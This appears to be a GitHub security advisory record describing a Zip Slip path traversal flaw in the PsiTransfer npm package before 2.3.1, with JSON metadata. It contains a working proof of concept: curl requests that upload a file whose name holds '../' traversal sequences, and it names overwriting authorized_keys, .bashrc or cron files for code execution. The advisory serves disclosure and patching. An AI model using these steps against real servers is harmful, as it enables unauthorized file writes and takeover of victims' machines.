ghsa-xphh-5v4r-r3rx
Vulnerability from github
Summary
A Zip Slip vulnerability in PsiTransfer allows an unauthenticated attacker to upload files with path traversal sequences in the filename (e.g. ../../../.ssh/authorized_keys). When a victim downloads the bucket as a .tar.gz archive and extracts it, malicious files are written outside the intended directory, potentially leading to RCE.
Details
The vulnerability exists in the archive download functionality in lib/endpoints.js where user controlled metadata.name is used directly without sanitization when creating TAR archive entries.
``` lib/endpoints.js:275
const entry = pack.entry({ name: info.metadata.name, size: info.size }); ```
lib/endpoints.js:372
assert(meta.name, 'tus meta prop missing: name');
PoC
I. Upload file with malicious filename (no authentication required).
``` MALICIOUS_NAME=$(echo -n "../../../tmp/dp.txt" | base64) SID=$(echo -n "evil" | base64) RETENTION=$(echo -n "3600" | base64)
curl -X POST http://TARGET:3000/files \ -H "Tus-Resumable: 1.0.0" \ -H "Upload-Length: 15" \ -H "Upload-Metadata: name ${MALICIOUS_NAME},sid ${SID},retention ${RETENTION}" ```
II. Complete upload with PATCH
curl -X PATCH "http://TARGET:3000/files/evil++<UUID>" \
-H "Tus-Resumable: 1.0.0" \
-H "Upload-Offset: 0" \
-H "Content-Type: application/offset+octet-stream" \
-d "MALICIOUS_CONTENT"
III. Victim downloads and extracts TAR
curl "http://TARGET:3000/files/evil++<HASH>.tar.gz" -o files.tar.gz
tar -tzf files.tar.gz
Impact
Arbitrary File Write: Attacker can write files anywhere on victim's filesystem when they extract the archive. RCE: By targeting ~/.bashrc, ~/.ssh/authorized_keys, cron directories etc... No Authentication Required: Default configuration has uploadPass: false. Social Engineering Vector: Attacker sends malicious download link to victim.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "psitransfer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-30T19:25:04Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nA Zip Slip vulnerability in PsiTransfer allows an unauthenticated attacker to upload files with path traversal sequences in the filename (e.g. `../../../.ssh/authorized_keys`). When a victim downloads the bucket as a **.tar.gz** archive and extracts it, malicious files are written outside the intended directory, potentially leading to RCE.\n\n### Details\n\nThe vulnerability exists in the archive download functionality in **lib/endpoints.js** where user controlled metadata.name is used directly without sanitization when creating TAR archive entries.\n\n```\nlib/endpoints.js:275\n\nconst entry = pack.entry({ name: info.metadata.name, size: info.size });\n```\n\n```\nlib/endpoints.js:372\nassert(meta.name, \u0027tus meta prop missing: name\u0027);\n```\n\n### PoC\n\nI. Upload file with malicious filename (no authentication required).\n\n```\nMALICIOUS_NAME=$(echo -n \"../../../tmp/dp.txt\" | base64)\nSID=$(echo -n \"evil\" | base64)\nRETENTION=$(echo -n \"3600\" | base64)\n\ncurl -X POST http://TARGET:3000/files \\\n -H \"Tus-Resumable: 1.0.0\" \\\n -H \"Upload-Length: 15\" \\\n -H \"Upload-Metadata: name ${MALICIOUS_NAME},sid ${SID},retention ${RETENTION}\"\n```\n\nII. Complete upload with PATCH\n\n```\ncurl -X PATCH \"http://TARGET:3000/files/evil++\u003cUUID\u003e\" \\\n -H \"Tus-Resumable: 1.0.0\" \\\n -H \"Upload-Offset: 0\" \\\n -H \"Content-Type: application/offset+octet-stream\" \\\n -d \"MALICIOUS_CONTENT\"\n```\n \nIII. Victim downloads and extracts TAR\n\n```\ncurl \"http://TARGET:3000/files/evil++\u003cHASH\u003e.tar.gz\" -o files.tar.gz\ntar -tzf files.tar.gz\n```\n\n### Impact\n\nArbitrary File Write: Attacker can write files anywhere on victim\u0027s filesystem when they extract the archive.\nRCE: By targeting ~/.bashrc, ~/.ssh/authorized_keys, cron directories etc...\nNo Authentication Required: Default configuration has **uploadPass: false**.\nSocial Engineering Vector: Attacker sends malicious download link to victim.",
"id": "GHSA-xphh-5v4r-r3rx",
"modified": "2025-12-30T19:25:04Z",
"published": "2025-12-30T19:25:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/psi-4ward/psitransfer/security/advisories/GHSA-xphh-5v4r-r3rx"
},
{
"type": "WEB",
"url": "https://github.com/psi-4ward/psitransfer/commit/6c71bc0b8afa1ffa7aabd6c5fb28677651fd57b6"
},
{
"type": "PACKAGE",
"url": "https://github.com/psi-4ward/psitransfer"
},
{
"type": "WEB",
"url": "https://github.com/psi-4ward/psitransfer/releases/tag/v2.3.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "PsiTransfer has Zip Slip Path Traversal via TAR Archive Download"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.